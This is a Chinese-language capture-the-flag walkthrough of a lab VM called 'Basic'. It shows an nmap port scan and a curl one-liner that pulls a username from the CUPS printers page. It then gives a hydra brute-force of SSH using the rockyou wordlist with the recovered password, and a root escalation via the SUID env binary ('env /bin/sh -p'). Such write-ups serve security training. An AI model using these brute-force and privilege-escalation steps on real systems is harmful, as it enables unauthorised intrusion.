# 靶场搭建
下载:Basic
下载、导入、NAT
IP: 192.168.1.135
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Test Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) | |
631/tcp open ipp CUPS 2.3 | |
|_http-title: Inicio - CUPS 2.3.3op2 | |
|_http-server-header: CUPS/2.3 IPP/2.1 | |
| http-robots.txt: 1 disallowed entry | |
|_/ |
631 之前也出现过的,是个打印机服务,里面可能存在用户
我们提取一下用户名: curl http://192.168.1.135:631/printers | grep HREF | cut -d/ -f3 | cut -d_ -f1
发现只有一个人: dimitri
目录收集,exp 都无,那剩下的只有爆破了欧耶
# 爆破
ssh 爆破了
┌──(root㉿kali)-[~] | |
└─# hydra -l dimitri -P /usr/share/wordlists/rockyou.txt 192.168.1.135 ssh -t 20 -I | |
# 700 多次拿到密码 |
密码: mememe
# 提权
无 sudo,无计划任务,有 suid 文件,发现 env 可以利用
dimitri@basic:~$ env /bin/sh -p | |
# whoami | |
root |
拿下!
# 小结
看 sudo 看文件权限看计划任务
有 suid 权限的程序去搜一搜有没有可能进行提权。
